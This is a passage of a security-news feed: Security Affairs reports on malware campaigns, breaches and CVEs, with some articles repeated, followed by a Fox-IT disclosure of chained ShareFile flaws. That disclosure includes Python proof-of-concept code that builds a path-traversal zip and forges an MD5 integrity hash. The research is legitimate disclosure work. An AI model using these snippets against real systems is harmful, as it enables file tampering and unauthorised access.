The step2 function collects and encodes various system information, then sends it to the server: architecture, computer name, user name, processors, OS, domain, manufacturer, model, BIOS version, anti-spyware product, anti-virus product, MAC address, keyboard, pointing device, display controller configuration, and process list.

The server then responds with a function named step3 and Update.js, which it the script to downloads and executes the final payload.

The Javascript uses PowerShell commands to download multiple files from the server, including:

  • 7za.exe: 7zip standalone executable
  • LogList.rtf: Password-protected archive file
  • Upd.cmd: Batch script to install the NetSupport Client
  • Downloads.txt: List of IPs (possibly the infected systems)
  • Get.php: Downloads LogList.rtf

The script performs the following tasks:

  1. Extract the archive using the 7zip executable with the password mentioned in the script.
  2. After extraction, delete the downloaded archive file (loglist.rtf).
  3. Disable Windows Error Reporting and App Compatibility.
  4. Add the remote control client executable to the firewall’s allowed program list.
  5. Run remote control tool (client32.exe).
  6. Add Run registry entry with the name “ManifestStore” or downloads shortcut file to Startup folder.
  7. Hide the files using attributes.
  8. Delete all the artifacts (7zip executable, script, archive file).

Attackers use the NetSupport Manager to gain remote access to the compromised systems and control it.

The final JavaScript also downloaded a list of IP addresses that could be compromised systems, most of them in the U.S., Germany, and the Netherlands.

Further details, including the IOCs are reported in the analysis.

Pierluigi Paganini

(Security Affairs – NetSupport RAT, hacking)

The post Crooks distribute malware masquerade as fake software updates and use NetSupport RAT appeared first on Security Affairs.

Vigilante hackers strike Russia and Iran Networks exploiting Cisco CVE-2018-0171 flaw

Last week, the hacking crew “JHT” launched a hacking campaign exploiting Cisco CVE-2018-0171 flaw against network infrastructure in Russia and Iran.

Last week, the hacking crew “JHT” launched a hacking campaign against CISCO devices in Russian and Iranian networks.

The hackers exploited the Cisco CVE-2018-0171 Smart Install to reset the routers to the startup-config and reboot the devices, then they left the following message to the victims:

“Don’t mess with our elections…. -JHT usafreedom_jht@tutanota.com”

Threat actors used seemly automated tools to exploit Cisco IOS and Cisco IOS XE critical flaws (CVE-2018-0171 & CVE-2018-0156) to cause mass network outages.

Smart Install is a legacy plug-and-play configuration and image-management feature that provides zero-touch deployment for new switches.

Cisco PSIRT has published a new security advisory for abuse of the Smart Install protocol, the IT giant has identified hundreds of thousands of exposed devices online.

Cisco is advising organizations that hackers could target its switches via the Smart Install protocol. The IT giant has identified hundreds of thousands of exposed devices and warned critical infrastructure using them of potential risks.

“Cisco is aware of a significant increase in Internet scans attempting to detect devices where, after completing setup, the Smart Install feature remains enabled and without proper security controls. This could leave the involved devices susceptible to misuse of the feature. ” reads the new security advisory.

“Several researchers have reported on the use of Smart Install (SMI) protocol messages toward Smart Install clients, also known as integrated branch clients (IBC), allowing an unauthenticated, remote attacker to change the startup-config file and force a reload of the device, load a new IOS image on the device, and execute high-privilege CLI commands on switches running Cisco IOS and IOS XE Software.”

The wave of attacks hit thousands of devices in Iran, Iran’s Communication and Information Technology Ministry stated that over 200,000 routers worldwide were affected, with 3,500 of them being in Iran.

“Hackers have attacked networks in a number of countries including data centers in Iran where they left the image of a U.S. flag on screens along with a warning: “Don’t mess with our elections”, the Iranian IT ministry said on Saturday.”

“The attack apparently affected 200,000 router switches across the world in a widespread attack, including 3,500 switches in our country,” the Communication and Information Technology Ministry said in a statement carried by Iran’s official news agency IRNA.

Iran’s ICT Minister Mohammad Javad Azari-Jahromi stated 95% of the affected routers in the country had been already restored to normal service.

According to Joseph Cox from Motherboard who has reached the attackers, behind the assaults, there are vigilante hackers that scanned the Internet for vulnerable CISCO devices and exploited the flaw against systems in Russia and Iran.

Pierluigi Paganini

(Security Affairs – Cisco CVE-2018-0171, hacking)

The post Vigilante hackers strike Russia and Iran Networks exploiting Cisco CVE-2018-0171 flaw appeared first on Security Affairs.

Auth0 authentication bypass issue exposed enterprises to hack

Auth0, one of the biggest identity-as-a-service platform is affected by a critical authentication bypass vulnerability that exposed enterprises to hack.

Auth0, one of the biggest identity-as-a-service platform is affected by a critical authentication bypass vulnerability that could be exploited by attackers to access any portal or application which are using it for authentication.

Auth0 implements a token-based authentication model for a large number of platforms, it managed 42 million logins every day and billions of login per month for over 2000 enterprise customers.

Auth0

In September 2017, researchers from security firm Cinta Infinita discovered a flaw in Auth0’s Legacy Lock API while they were pentesting an unnamed application that used service for the authentication.

The vulnerability tracked as CVE-2018-6873 it related to improper validation of the JSON Web Tokens (JWT) audience parameter.

The experts exploited this issue to bypass login authentication using a cross-site request forgery (CSRF/XSRF) attack triggering the CVE-2018-6874 flaw against applications implementing Auth0 authentication.

The experts exploited the CSRF vulnerability to reuse a valid signed JWT generated for a separate account to access the targeted victim’s account.

The unique information needed by attackers is the victim’s user ID or email address, that could be easily obtained with social engineering attacks.

“So, now we had the ability to forge a valid signed JWT with the “email” and “user_id” of the victim.” reads the analysis of the experts.

“It worked!! Why? The audience claim was not being checked and JWTs generated from our test application were accepted by the Management Console app (same signing key / private certificate).”

Below a video PoC of the attack to demonstrate how to obtain the victim’s user id and bypass password authentication when logging into Auth0’s Management Dashboard by forging an authentication token.

The researchers explained that it is possible to use this attack against many organizations.

Could we use this attack to access arbitrary applications? Yes, as long as we know the expected fields and values for the JWT. There is no need of social engineering in most of the cases we saw. Authentication for applications that use an email address or an incremental integer for user identification would be trivially bypassed.” continues the analysis.

Security firm Cinta Infinita reported the vulnerability to the company in October 2017 and Auth0 solved the issue in a few hours but it spent several months to reach each customers using the vulnerable SDK and supported libraries of Auth0.

“We waited for six months before publicly disclosing this issue so that Auth0could update all their Private SaaS Appliances (on-premise) as well.” continues the analysis.

“Auth0 published a blog post about their internal vulnerability management and remediation process where they mention our finding and the assistance we provided: https://auth0.com/blog/managing-and-mitigating-security-vulnerabilities-at-auth0/

Pierluigi Paganini

(Security Affairs – Authentication, hacking)

The post Auth0 authentication bypass issue exposed enterprises to hack appeared first on Security Affairs.

ATMJackpot, a new strain of ATM Malware discovered by experts

A new strain of ATM jackpotting malware dubbed ATMJackpot has been discovered by experts at Netskope Threat Research Labs.

The malware is still under development and appears to have originated in Hong Kong, it has a smaller system footprint compared with similar threats.

“Netskope Threat Research Labs has discovered a new ATM malware, “ATMJackpot.” The malware seems to have originated from Hong Kong and has a time stamp on the binary as 28th March 2018.” reads the analysis published by the experts at Netskope.

“It is likely that this malware is still under development. Compared with previously-discovered malware, this malware has a smaller system footprint,”

The malware has a smaller system footprint, it has a simple graphical user interface that displays a limited number of information, including the hostname, the service provider information such as cash dispenser, PIN pad, and card reader information.

ATMJackpot malware

At the time, it is not clear that attack vector for the ATMJackpot malware, usually this kind of malware are manually installed via USB on ATMs, or downloaded from a compromised network.

“ATM Malware propagates via physical access to the ATM using USB, and also via the network by downloading the malware on to already-compromised ATM machines using sophisticated techniques.” continues the analysis.

ATMJackpot malware first registers the windows class name ‘Win’ with a procedure for the malware activity, then the malicious code creates the window, populates the options on the window, and initiates the connection with the XFS manager.

The XFS manager implements API to access that allow controlling the ATM devices from different vendors. The malware opens a session with the service providers and registers to monitor events, then it opens a session with the cash dispenser, the card reader, and the PIN pad service providers.

Once the session with service providers are opened, the malware is able to monitor events and issue commands.

Experts believe authors of the malware will continue to improve it and they expect it will be soon detected in attacks in the wild.

The number of ATM jackpot attacks is increasing in recent years, in January US Secret Service warned of cybercriminals are targeting ATM machines in the US forcing them to spit out hundreds of dollars with ‘jackpotting‘ attacks.

In May 2017, Europol arrested 27 for jackpotting attacks on ATM across Europe, in September 2017 Europol warned that ATM attacks were increasing.

Criminal organizations are targeting ATM machines through the banks’ networks, the operations involve squads of money mules for the cashout.

“The malware being used has evolved significantly and the scope and scale of the attacks have grown proportionately,” said Steven Wilson, head of Europol’s EC3 cyber crime centre.

A few weeks ago, the alleged head of the Carbanak group was arrested in Spain by the police, the gang is suspected of stealing about £870m (€1bn) in a bank cyberheist.

Further information on ATM Malware and jackpotting are available here.

Pierluigi Paganini

(Security Affairs – ATMJackpot, jackpotting )

The post ATMJackpot, a new strain of ATM Malware discovered by experts appeared first on Security Affairs.

Security Affairs: ATMJackpot, a new strain of ATM Malware discovered by experts

A new strain of ATM jackpotting malware dubbed ATMJackpot has been discovered by experts at Netskope Threat Research Labs.

The malware is still under development and appears to have originated in Hong Kong, it has a smaller system footprint compared with similar threats.

“Netskope Threat Research Labs has discovered a new ATM malware, “ATMJackpot.” The malware seems to have originated from Hong Kong and has a time stamp on the binary as 28th March 2018.” reads the analysis published by the experts at Netskope.

“It is likely that this malware is still under development. Compared with previously-discovered malware, this malware has a smaller system footprint,”

The malware has a smaller system footprint, it has a simple graphical user interface that displays a limited number of information, including the hostname, the service provider information such as cash dispenser, PIN pad, and card reader information.

ATMJackpot malware

At the time, it is not clear that attack vector for the ATMJackpot malware, usually this kind of malware are manually installed via USB on ATMs, or downloaded from a compromised network.

“ATM Malware propagates via physical access to the ATM using USB, and also via the network by downloading the malware on to already-compromised ATM machines using sophisticated techniques.” continues the analysis.

ATMJackpot malware first registers the windows class name ‘Win’ with a procedure for the malware activity, then the malicious code creates the window, populates the options on the window, and initiates the connection with the XFS manager.

The XFS manager implements API to access that allow controlling the ATM devices from different vendors. The malware opens a session with the service providers and registers to monitor events, then it opens a session with the cash dispenser, the card reader, and the PIN pad service providers.

Once the session with service providers are opened, the malware is able to monitor events and issue commands.

Experts believe authors of the malware will continue to improve it and they expect it will be soon detected in attacks in the wild.

The number of ATM jackpot attacks is increasing in recent years, in January US Secret Service warned of cybercriminals are targeting ATM machines in the US forcing them to spit out hundreds of dollars with ‘jackpotting‘ attacks.

In May 2017, Europol arrested 27 for jackpotting attacks on ATM across Europe, in September 2017 Europol warned that ATM attacks were increasing.

Criminal organizations are targeting ATM machines through the banks’ networks, the operations involve squads of money mules for the cashout.

“The malware being used has evolved significantly and the scope and scale of the attacks have grown proportionately,” said Steven Wilson, head of Europol’s EC3 cyber crime centre.

A few weeks ago, the alleged head of the Carbanak group was arrested in Spain by the police, the gang is suspected of stealing about £870m (€1bn) in a bank cyberheist.

Further information on ATM Malware and jackpotting are available here.

Pierluigi Paganini

(Security Affairs – ATMJackpot, jackpotting )

The post ATMJackpot, a new strain of ATM Malware discovered by experts appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 157 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Airbnb China will share hosts information with the government
·      Any social media accounts to declare? Visa applicants would have to declare them
·      Apple macOS issues reveal passwords for APFS encrypted volumes in plaintext
·      Philippine central bank has thrown an alert after SWIFT hackers hit Malaysia central bank
·      After Cambridge Analytica scandal Facebook announces Election security Improvements
·      HiddenMiner Android Cryptocurrency miner can brick your device
·      MITRE is evaluating a service dubbed ATT&CK for APT detection
·      VPNs & Privacy Browsers leak users’ IPs via WebRTC
·      70% of VPN Chrome Extensions Leak Your DNS
·      Fin7 hackers stole 5 Million payment card data from Saks Fifth Avenue and Lord & Taylor Stores
·      Google to banish cryptocurrency mining extensions from official Chrome Web Store
·      Grindr shared people HIV status with other companies
·      Project Kalamata – Apple will replace Intel processors in Macs with its custom designed chips
·      KevDroid Android RAT can steal private data and record phone calls
·      Many natural gas pipeline operators in the U.S. Gas affected by cyberattack
·      Microsoft issued out-of-band patch to fix CVE-2018-0986 Malware Protection Engine flaw
·      Panera Bread left millions of customer records exposed online for months
·      Thousands of compromised Magento websites delivering Malware
·      Facebook: Cambridge Analytica scandal affected 87 Million users
·      North Korea-Linked Lazarus APT suspected for online Casino assault
·      OSX_OCEANLOTUS.D, a new macOS backdoor linked to APT 32 group
·      Zuckerberg admitted public data of its 2.2 billion users has been scraped by Third-party entities
·      A Remote Code Execution Vulnerability found in the Spring Framework. Upgrade it now!
·      Cisco Smart Install Protocol misuse could expose critical infrastructure to attacks
·      VirusTotal presents its new Android Droidy sandbox
·      [24]7.ai Payment Card Breach affected major firms, including Best Buy, After Delta Air Lines and Sears Holdings
·      130,000 Finnish user data exposed in third largest data breach ever happened in the country
·      After Cambridge Analytica Facebook COO Sandberg admits other possible misuses
·      New variant of the Mirai Botnet targets the financial industry

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 157 – News of the week appeared first on Security Affairs.

Experts spotted a campaign spreading a new Agent Tesla Spyware variant

A new variant of the infamous Agent Tesla spyware was spotted by experts at Fortinet, the malware has been spreading via weaponize Microsoft Word documents.

Agent Tesla is a spyware that is used to spy on the victims by collecting keystrokes, system clipboard, screenshots, and credentials from the infected system. To do this, the spyware creates different threads and timer functions in the main function.

The experts first discovered the malware in June, when they observed threat actors spreading it via a Microsoft Word document containing an auto-executable malicious VBA Macro.

Once the users have enables the macro, the spyware will be installed on the victim’s machine

The mail used in the last campaign contains text that appears not clear and it asks users to double click to enable the clear view.

Agent Tesla

“As you can see, it asks the victim to double click the blue icon to enable a “clear view.” Once clicked, it extracts an exe file from the embedded object into the system’s temporary folder and runs it.  In this case, the exe file is called “POM.exe”.” continues the blog post.

When the users click on the blue icon, a POM.exe file written in Visual Basic being extracted from the embedded object, then it is saved to the system’s temporary folder and executed.

According to Fortinet, the POM.exe is a sort of installer for the final malware.

“Based on my analysis, it’s a kind of installer program. When it runs, it drops two files: “filename.exe” and “filename.vbs” into the “%temp%\subfolder”. It then exits the process after executing the file “filename.vbs”.  Below, in figure 4, is the content of “filename.vbs”.” continues the analysis.

The variant used in the last campaign is similar to the older one except for the usage of the SMTPS to send the collected data to the attacker’s email box, instead of HTTP POST requests.

“However, the way of submitting data to the C&C server has changed. It used to use HTTP POST to send the collected data. In this variant, it uses SMTPS to send the collected data to the attacker’s email box.” continues the analysis.

“Based on my analysis, the commands used in the SMTP method include “Passwords Recovered”, “Screen Capture”, and “Keystrokes”, etc.  The commands are identified within the email’s “Subject” field.  For example:

“System user name/computer name Screen Capture From: victim’s IP”

The attackers used a free Zoho email account for this campaign.

Further details

Pierluigi Paganini

(Security Affairs – Agent Tesla, spyware)

The post Experts spotted a campaign spreading a new Agent Tesla Spyware variant appeared first on Security Affairs.

Security Affairs: After Cambridge Analytica Facebook COO Sandberg admits other possible misuse

After the Cambridge Analytica privacy scandal, Facebook chief operating officer Sheryl Sandberg admitted that the company cannot rule out other cases of misuse.

In the wake of recent revelations about the Cambridge Analytica scandal, Facebook Chief operating officer Sheryl Sandberg doesn’t exclude other data misuse.

Sandberg gave two interviews last weeks to National Public Radio and NBC’s “Today Show during which she admitted the severe responsibility of the company. She pointed out that Facebook was not able to prevent third parties from abusing its platform, she said that the company should have taken further steps to protect the privacy of its users.

“We know that we did not do enough to protect people’s data,” Sandberg told NPR. “I’m really sorry for that. Mark is really sorry for that, and what we’re doing now is taking really firm action.”

“Safety and security is never done, it’s an arms race,” she said. “You build something, someone tries to abuse it.”

“But the bigger is, ‘Should we have taken these steps years ago anyway?'” Sandberg said. “And the answer to that is yes.”

“We really believed in social experiences, we really believed in protecting privacy, but we were way too idealistic,” she added. 

“We did not think enough about the abuse cases and now we’re taking really firm steps across the board.”

One of the most debated aspects of the Cambridge Analytica scandal is that Facebook was aware of the misuses years before.  Unfortunately, this is true and Sandberg confirmed it. She said that Facebook was first aware two and a half years ago that Cambridge Analytica had obtained user data in an illegal way.

“When we received word that this researcher gave the data to Cambridge Analytica, they assured us it was deleted,” she said. “We did not follow up and confirm, and that’s on us — and particularly once they were active in the election, we should have done that.”

Cambridge Analytica

When asked by journalists at “Today Show” if other cases of misuse of user data could be expected, Sandberg

Sandberg was asked by the “Today Show” if other cases of misuse of user data could be expected, she said it is possible and for this reason, the social media giant is doing an investigation.

“We’re doing an investigation, we’re going to do audits and yes, we think it’s possible, that’s why we’re doing the audit,” she told NPR..

“That’s why this week we shut down a number of use cases in other areas — in groups, in pages, in events — because those are other places where we haven’t necessarily found problems, but we think that we should be more protective of people’s data,” 

Sandberg announced that from next week, the news feed will be integrated with a feature that will allow users to see all the apps they’ve shared their data with.

“a place where you can see all the apps you’ve shared your data with and a really easy way to delete them.”

Sandberg admitted that the Facebook should have detected the Russian interference in the 2016 presidential election, but this was a lesson for the company that in the future will not permit it again.

“That was something we should have caught, we should have known about,” she told NPR. “We didn’t. Now we’ve learned.”

“We’re going after fake accounts,” “A lot of it is politically motivated but even more is economically motivated.”

Zuckerberg will appear before a US congressional panel next week to address privacy issues.

Pierluigi Paganini

(Security Affairs – Cambridge Analytica, Facebook)

The post After Cambridge Analytica Facebook COO Sandberg admits other possible misuse appeared first on Security Affairs.



Security Affairs

After Cambridge Analytica Facebook COO Sandberg admits other possible misuses

After the Cambridge Analytica privacy scandal, Facebook chief operating officer Sheryl Sandberg admitted that the company cannot rule out other cases of misuse.

In the wake of recent revelations about the Cambridge Analytica scandal, Facebook Chief operating officer Sheryl Sandberg doesn’t exclude other data misuse.

Sandberg gave two interviews last weeks to National Public Radio and NBC’s “Today Show during which she admitted the severe responsibility of the company. She pointed out that Facebook was not able to prevent third parties from abusing its platform, she said that the company should have taken further steps to protect the privacy of its users.

“We know that we did not do enough to protect people’s data,” Sandberg told NPR. “I’m really sorry for that. Mark is really sorry for that, and what we’re doing now is taking really firm action.”

“Safety and security is never done, it’s an arms race,” she said. “You build something, someone tries to abuse it.”

“But the bigger is, ‘Should we have taken these steps years ago anyway?'” Sandberg said. “And the answer to that is yes.”

“We really believed in social experiences, we really believed in protecting privacy, but we were way too idealistic,” she added. 

“We did not think enough about the abuse cases and now we’re taking really firm steps across the board.”

One of the most debated aspects of the Cambridge Analytica scandal is that Facebook was aware of the misuses years before.  Unfortunately, this is true and Sandberg confirmed it. She said that Facebook was first aware two and a half years ago that Cambridge Analytica had obtained user data in an illegal way.

“When we received word that this researcher gave the data to Cambridge Analytica, they assured us it was deleted,” she said. “We did not follow up and confirm, and that’s on us — and particularly once they were active in the election, we should have done that.”

Cambridge Analytica

When asked by journalists at “Today Show” if other cases of misuse of user data could be expected, Sandberg

Sandberg was asked by the “Today Show” if other cases of misuse of user data could be expected, she said it is possible and for this reason, the social media giant is doing an investigation.

“We’re doing an investigation, we’re going to do audits and yes, we think it’s possible, that’s why we’re doing the audit,” she told NPR..

“That’s why this week we shut down a number of use cases in other areas — in groups, in pages, in events — because those are other places where we haven’t necessarily found problems, but we think that we should be more protective of people’s data,” 

Sandberg announced that from next week, the news feed will be integrated with a feature that will allow users to see all the apps they’ve shared their data with.

“a place where you can see all the apps you’ve shared your data with and a really easy way to delete them.”

Sandberg admitted that the Facebook should have detected the Russian interference in the 2016 presidential election, but this was a lesson for the company that in the future will not permit it again.

“That was something we should have caught, we should have known about,” she told NPR. “We didn’t. Now we’ve learned.”

“We’re going after fake accounts,” “A lot of it is politically motivated but even more is economically motivated.”

Zuckerberg will appear before a US congressional panel next week to address privacy issues.

Pierluigi Paganini

(Security Affairs – Cambridge Analytica, Facebook)

The post After Cambridge Analytica Facebook COO Sandberg admits other possible misuses appeared first on Security Affairs.

130,000 Finnish user data exposed in third largest data breach ever happened in the country

Personal information belonging to more than 130,000 Finnish citizens have been compromised in the third largest data breach ever happened in the country.

The data breach affected a website maintained by the New Business Center in Helsinki (“Helsingin Uusyrityskeskus”), that is company that provides business advice to entrepreneurs.

“Data batches have overwritten username and password for over 130,000 users. The violation occurred on an open website for business ideas (liiketoimintasuunnitelma.com).” reported the local media Svenska.

After the discovery of the data breach on 3rd April, the new business center in Helsinki has taken down the affected website.

The bad news for the Finnish citizens is that the password stored on the website were in plain text.

The Finnish Communications Regulatory Authority (FICORA) is warning users of a massive data breach.

“About 130,000 user accounts and plaintext passwords have been revealed. Other confidential information may also have been disclosed. Due to the number of user accounts exposed, this is Finland’s third largest data breach.” states the advisory published by FICORA.

“We are very sorry for all the people who have been subjected to crime and who may be affected by mental or financial disadvantages. Unfortunately, we are not yet able to know exactly how many people are and what information this information breaks. We have filed an offense report, and the parties do not need to report to the police separately,” said Jarmo Hyökyvaara, Chairman of the Board of the New Business Center of Helsinki.

“The maintenance and security of our service was the responsibility of our subcontractor, our long-term partner. Unfortunately, the security of the service has not been enough to prevent this kind of attack. This is, in part, our mistake, and as a subscriber and owner of the service we are responsible for this.”

data breach

The New Business Center in Helsinki added that detailed information about its users was not exposed because they were stored on a different system, which was not affected by the data breach.

The company reported the security breach to law enforcement that is investigating the case.

Once the website will be online again, users are recommended to change their passwords immediately, I also suggest changing the passwords on any other service online for which the customers used the same credentials.

Pierluigi Paganini

(Security Affairs – New Business Center in Helsinki, data breach)

The post 130,000 Finnish user data exposed in third largest data breach ever happened in the country appeared first on Security Affairs.

New variant of the Mirai Botnet targets the financial industry

Early this year at least three European financial institutions were hit by DDoS attacks powered by a new variant of the Mirai botnet.

A variant of the Mirai botnet, composed at lease of 13,000 compromised IoT devices was used to launch a series of DDoS attacks against financial sector businesses. The DDoS attacks peaked at up to 30 Gbps, in volume, of malicious traffic.

Researchers at Insikt Group, the Recorded Future threat research team, reported this week the results of their analysis of the malware samples involved in the assaults linked the Mirai variant to IoTroop botnet, aka Reaper.

The latest attacks observed by Recorded Future took place between Jan. 27 through 28, the experts spotted three different attacks.

“The first attack occurred on January 28, 2018 at 1830 UTC. A second financial sector company experienced a DDoS attack the same day and time, likely utilizing the same botnet. A third financial sector company experienced a similar DDoS attack a few hours later at 2100 UTC the same day.” states the report published by Recorded Future.

The first DDoS attack implemented a DNS amplification technique and peaked at 30 Gbps. Researchers are unsure what the volumes of subsequent attacks were.

mirai botnet iot-3

According to the researchers, the botnet used in the first company attack was composed of 80 percent of compromised MikroTik routers and 20% various IoT devices (i.e. Apache and IIS web servers, webcams, DVRs, TVs, and routers).

The experts speculated about a possible evolution of the IoTroop botnet that was improved by including the code to trigger new vulnerabilities in IoT devices.

“If these attacks were conducted by IoTroop, then our observations indicate the botnet has evolved since October 2017 to exploit vulnerabilities in additional IoT devices and is likely to continue to do so to propagate the botnet and facilitate larger DDoS attacks,” continues the report.

The experts at Recorded Future found some differences between this latest variant of Mirai from the original Mirai and IoTroop bot.

The ability of the botnet of infecting devices from different manufacturers suggests a widespread and rapidly evolving botnet that appears to be leveraging publicly disclosed flaws in many IoT devices.

“While many of the IoT vendors and devices appeared in the (IoTroop) research published in October 2017, many of the devices such as Dahua CCTV DVRs, Samsung UE55D7000 TVs and Contiki-based devices were previously unknown to be vulnerable to Reaper/IoTroop malware,” researchers said.

The most important improvement of the Mirai variant used in the last attacks is the inclusion of the IoTroop code that allows the botmaster to update the malware on the fly.

“Reaper was built using a flexible Lua engine and scripts, which means that instead of being limited to the static, pre-programmed attacks of previous exploits, its code can be easily updated on the fly, allowing massive in-place botnets to run new and more malicious attacks as soon as they become available,” continues the analysis.

The availability of the Mirai source code is allowing crooks to create their own versions of the botnet and rent it to other cybercriminals, it is to predict new attacks powered by improved versions of the original botnet.

Pierluigi Paganini

(Security Affairs – Mirai botnet, DDoS)

The post New variant of the Mirai Botnet targets the financial industry appeared first on Security Affairs.

A Remote Code Execution Vulnerability found in the Spring Framework. Upgrade it now!

Security experts have discovered a vulnerability in the Spring Framework that could be exploited by a remote attacker to execute arbitrary code on applications built with it.

Security researchers have discovered three vulnerabilities in the Spring Development Framework, one of them could be exploited by a remote attacker to execute arbitrary code on applications built with it.

Pivotal’s Spring is widely used open source framework for the development of web applications.  Affected Spring Framework versions are 5.0 to 5.0.4, 4.3 to 4.3.14, and older versions.

The security advisory published by Pivotal includes technical details of the following three vulnerabilities;

  • CVE-2018-1270: Remote Code Execution with spring-messaging, it is rated as “Critical”.

“Spring Framework versions 5.0 to 5.0.4, 4.3 to 4.3.14, and older unsupported versions allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module.” reads the advisory.

An attacker can send specially crafted messages to the broker in order to trigger the remote code execution flaw.

  • CVE-2018-1271: Directory Traversal with Spring MVC on Windows, it is rated as “High”.

“Spring Framework versions 5.0 to 5.0.4, 4.3 to 4.3.14, and older unsupported versions allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images).” reads the advisory. 

An attacker can use a specially crafted URL to lead a directory traversal attack.

  • CVE-2018-1272: Multipart Content Pollution with Spring Framework, it is rated as “Low”.

“When Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could to lead privilege escalation, for example, if the part content represents a username or user roles.” reads the advisory.

An attacker that is able to guess the multipart boundary value chosen by server A for the multipart request to server B could successfully exploit the issue. This means that the attacker needs to gain the control of the server or have to find a way to see the HTTP log of server A through a separate attack vector.

Pivotal's Spring framework Data REST

The above issued are addressed with the Spring Framework 5.0.5 and 4.3.15. Pivotal also released Spring Boot 2.0.1 and 1.5.11.0.

Development teams need to upgrade their software to the latest versions as soon as possible.

Pierluigi Paganini

(Security Affairs – hacking, Spring framework)

The post A Remote Code Execution Vulnerability found in the Spring Framework. Upgrade it now! appeared first on Security Affairs.

Compromising ShareFile on-premise via 7 chained vulnerabilities

A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog describes how Fox-IT identified several vulnerabilities, which together allowed any account to access any file stored within ShareFile. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to their cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several fortune-500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the Cloud or with an on-premise component).

Sharefile

Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at name.sharefile.eu (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which is the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the filetransfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request such as the filename, file size, et cetera. It also contains an uploadid which is used to identify the upload. Lastly we see a h= parameter, followed by a base64 encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following python code creates a special zip file called out.zip, which contains two files, one of which has a relative path.

import sys, zipfile
#the name of the zip file to generate
zf = zipfile.ZipFile('out.zip', 'w')
#the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'xxe_oob.xml'
#destination path of the file
zf.write(fname, '../../../../testbestand_fox.tmp')
#random extra file (not required)
#example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but that we were able to successfully change the directory to which the file was extracted. This vulnerability can be used to write user controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine the default extraction path would be c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\ we can add a file with the name ../storage/subdirectory/filename.txt which will then be written to the target directory. The ../ part indicates that the Operating System should go one directory higher in the directory tree and use the rest of the path from that location.

Vulnerability 1: Path traversal in archive extraction

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistenstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

When a new upload was initialized, the URLs contained a parameter called uploadid. As the name already indicates this is the ID assigned to the upload, in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there are folders for each upload matching with this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:

Info.txt

In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name, the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32 character long uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond with the file ID for the upload and folder ID to which the file is uploaded respectively.

After trying to figure out for a while what kind of hashing algorithm was used for the integrity check of this file, it turned out that it is a simple md5 hash of the rest of the data in the info.txt file. The twist here is that the data is encoded with UTF-16-LE, which is default for Unicode strings in Windows.

Armed with this knowledge we can write a simple python script which calculates the correct hash over a modified info.txt file and write this back to disk:

import md5
with open('info_modified.txt','r') as infile:
instr = infile.read().strip().split('|')
instr2 = u'|'.join(instr[:-1])
outhash = md5.new(instr2.encode('utf-16-le')).hexdigest().upper()
with open('info_out.txt','w') as outfile:
outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the info.txt file is not verified for integrity using a secret only known by the application, but is only validated with an md5 hash against corruption. This gives an attacker that can write to the storage folders the possibility to alter the upload information.

